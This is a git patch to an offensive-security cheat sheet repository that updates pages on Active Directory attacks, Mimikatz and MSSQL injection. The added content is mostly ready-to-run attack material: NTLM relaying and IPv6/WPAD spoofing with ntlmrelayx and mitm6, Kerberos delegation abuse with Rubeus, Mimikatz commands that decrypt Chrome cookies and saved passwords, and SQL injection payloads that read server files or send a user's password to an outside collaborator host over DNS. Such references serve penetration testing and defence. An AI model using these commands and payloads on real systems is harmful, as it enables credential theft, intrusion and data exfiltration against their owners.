From 0443babe35ac771517bb8e0091b8b9f8a8cd02c0 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 25 Mar 2021 18:25:02 +0100 Subject: [PATCH] Relay + MSSQL Read File --- .../Active Directory Attack.md | 63 +++++++++++++------ .../Windows - Mimikatz.md | 16 ++++- SQL Injection/MSSQL Injection.md | 18 +++++- 3 files changed, 76 insertions(+), 21 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 38337c2..df51c28 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -50,7 +50,7 @@ - [Using impacket](#using-impacket) - [Using Rubeus](#using-rubeus) - [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) - - [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) + - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying) - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4) - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6) @@ -1436,7 +1436,7 @@ Then crack the hash with `hashcat` hashcat -m 5600 -a 0 hash.txt crackstation.txt ``` -### NTLMv2 hashes relaying +### Man-in-the-Middle attacks & relaying NTLMv1 and NTLMv2 can be relayed to connect to another machine. @@ -1473,14 +1473,13 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with HTTP = Off # Turn this off ``` 2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`. -3. Run `python Responder.py -I ` and `python MultiRelay.py -t -u ALL` -4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list. - ```powershell - ntlmrelayx.py -tf targets.txt - ``` +3. Run `python Responder.py -I ` +4. Use a relay tool such as `ntlmrelayx` or `MultiRelay` + - `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list. + - `python MultiRelay.py -t -u ALL` 5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions. ```powershell - $ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support + $ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support [*] Servers started, waiting for connections Type help for list of commands ntlmrelayx> socks @@ -1489,12 +1488,18 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 - - $ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1 - $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth + + # You might need to select a target with "-t" + impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support + impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support + + # the socks proxy can then be used with your Impacket tools or CrackMapExec + $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1 + $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth + $ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1" ``` -Mitigations: +**Mitigations**: * Disable LLMNR via group policy ```powershell @@ -1510,15 +1515,21 @@ Mitigations: Since MS16-077 the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS. ```powershell -cme smb $hosts --gen-relay-list relay.txt +crackmapexec smb $hosts --gen-relay-list relay.txt # DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6 +# -d is the domain name that we filter our request on - the attacked domain +# -i is the interface we have mitm6 listen on for events mitm6 -i eth0 -d $domain # spoofing WPAD and relaying NTLM credentials -ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt -or -ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug +impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt +impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug + +# -ip is the interface you want the relay to run on +# -wh is for WPAD host, specifying your wpad file to serve +# -t is the target where you want to relay to. +impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2 ``` #### Drop the MIC @@ -1984,8 +1995,10 @@ $ Get-DomainComputer -TrustedToAuth | select -exp dnshostname # Find the service $ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo +``` -# Exploit with Impacket +#### Exploit with Impacket +```ps1 $ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10 Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation @@ -1994,14 +2007,28 @@ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator.ccache +``` -# Exploit with Rubeus +#### Exploit with Rubeus +```ps1 $ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:... $ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt $ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt $ dir \\dc.domain.com\c$ ``` +#### Impersonate a domain user on a resource + +Require: +* SYSTEM level privileges on a machine configured with constrained delegation + +```ps1 +PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null +PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator') +PS> $idToImpersonate.Impersonate() +PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name +PS> ls \\dc01.offense.local\c$ +``` ### Kerberos Resource Based Constrained Delegation diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index f2df2d5..d7baa58 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -11,6 +11,9 @@ * [Mimikatz - Skeleton key](#mimikatz---skeleton-key) * [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover) * [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) + * [Chrome Cookies & Credential](#chrome-cookies--credential) + * [Task Scheduled credentials](#task-scheduled-credentials) + * [Vault](#vault) * [Mimikatz - Commands list](#mimikatz---commands-list) * [Mimikatz - Powershell version](#mimikatz---powershell-version) * [References](#references) @@ -178,8 +181,6 @@ net start sesshijack ``` - - ## Mimikatz - Credential Manager & DPAPI ```powershell @@ -196,6 +197,17 @@ $ mimikatz !sekurlsa::dpapi $ mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b ``` +### Chrome Cookies & Credential + +```powershell +# Saved Cookies +dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect +dpapi::chrome /in:"C:\Users\kbell\AppData\Local\Google\Chrome\User Data\Default\Cookies" /masterkey:9a6f199e3d2e698ce78fdeeefadc85c527c43b4e3c5518c54e95718842829b12912567ca0713c4bd0cf74743c81c1d32bbf10020c9d72d58c99e731814e4155b + +# Saved Credential in Chrome +dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect +``` + ### Task Scheduled credentials ```powershell diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 8e75bbd..e953694 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -14,6 +14,7 @@ * [MSSQL Blind Based](#mssql-blind-based) * [MSSQL Time Based](#mssql-time-based) * [MSSQL Stacked query](#mssql-stacked-query) +* [MSSQL Read file](#mssql-read-file) * [MSSQL Command execution](#mssql-command-execution) * [MSSQL Out of band](#mssql-out-of-band) * [MSSQL DNS exfiltration](#mssql-dns-exfiltration) @@ -147,6 +148,16 @@ Use a semi-colon ";" to add another query ProductID=1; DROP members-- ``` + +## MSSQL Read file + +**Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission. + +```sql +-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null +``` + + ## MSSQL Command execution ```sql @@ -196,7 +207,12 @@ GO Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1 ```powershell -1 and exists(select * from fn_trace_gettable('\\'%2b(select pass frop users where id=1)%2b'.xxxxxxx.burpcollaborator.net\1.trc',default)) +# Permissions: Requires VIEW SERVER STATE permission on the server. +1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null)) + +# Permissions: Requires the CONTROL SERVER permission. +1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default))) +1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default)) ```